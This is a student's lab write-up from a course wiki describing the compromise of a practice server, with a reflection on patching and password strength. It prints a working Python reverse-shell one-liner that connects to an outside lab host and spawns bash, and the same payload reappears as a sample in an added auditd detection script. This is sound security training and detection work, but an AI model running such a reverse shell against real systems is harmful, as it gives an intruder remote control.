Lab 10.2 - Adam-Hachem/SEC335 GitHub Wiki
Overview
The goal of this lab was to compromise a server, Nancurinir (a Lord of the Rings reference), document it all in a pentest report, and provide recommendations for remediation.
Useful commands
I needed to use a Python reverse shell to get a terminal that I could sudo from. This was the code I used:
export RHOST="10.0.17.87";export RPORT=4567;python3 -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'
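A defender-side view of the one-liner above, added here as an example and not part of the original lab: it scans auditd EXECVE records for an inline Python payload that combines a socket connection with stdio redirection. The record layout, the sample lines and all function names are constructed for illustration.

```python
import re

# Traits of a Python PTY reverse shell like the one-liner above. The target
# address is deliberately not a trait: the one-liner reads RHOST/RPORT from the
# environment, so the IP and port never appear in the python3 arguments.
TRAITS = {
    "socket": re.compile(r"socket\.socket\s*\("),
    "connect": re.compile(r"\.connect\s*\("),
    "dup2_stdio": re.compile(r"os\.dup2\s*\("),
    "pty_spawn": re.compile(r"pty\.spawn\s*\("),
}
ARG = re.compile(r'\ba(\d+)=("[^"]*"|\S+)')

# Constructed sample records (assumed auditd EXECVE layout, not lab output).
PAYLOAD = ('import socket,os,pty;s=socket.socket();'
           's.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));'
           '[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")')
HEAD = 'type=EXECVE msg=audit(1700000000.101:51): argc=3 a0="python3" a1="-c" a2='
SAMPLES = [
    HEAD + PAYLOAD.encode().hex().upper(),
    HEAD + b'print("backup done")'.hex().upper(),
    'type=EXECVE msg=audit(1700000000.303:53): argc=2 a0="python3" a1="manage.py"',
]

def decode_arg(raw):
    """auditd quotes plain arguments and hex-encodes ones with spaces or quotes."""
    if raw.startswith('"'):
        return raw.strip('"')
    try:
        return bytes.fromhex(raw).decode("utf-8", "replace")
    except ValueError:
        return raw

def execve_argv(record):
    """Return the decoded argv list from one EXECVE record."""
    args = {int(i): decode_arg(v) for i, v in ARG.findall(record)}
    return [args[i] for i in sorted(args)]

def reverse_shell_traits(record):
    """Trait names found in an inline (-c) Python payload, or [] if none."""
    argv = execve_argv(record)
    if not argv or not re.search(r"python[\d.]*$", argv[0]) or "-c" not in argv[:-1]:
        return []
    code = argv[argv.index("-c") + 1]
    return [name for name, rx in TRAITS.items() if rx.search(code)]

def is_suspicious(record):
    # socket + connect + stdio redirection together is the reverse-shell shape
    return {"socket", "connect", "dup2_stdio"} <= set(reverse_shell_traits(record))
```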
Reflection
In this lab, I showed how crucial it is to have strict rules for passwords and the significance of regularly updating your systems to newer versions. The exploit I used was patched a long time ago, but that doesn't matter if you don't update. Also, making credentials harder to crack would have made it more challenging to obtain the root password and establish complete control over the system.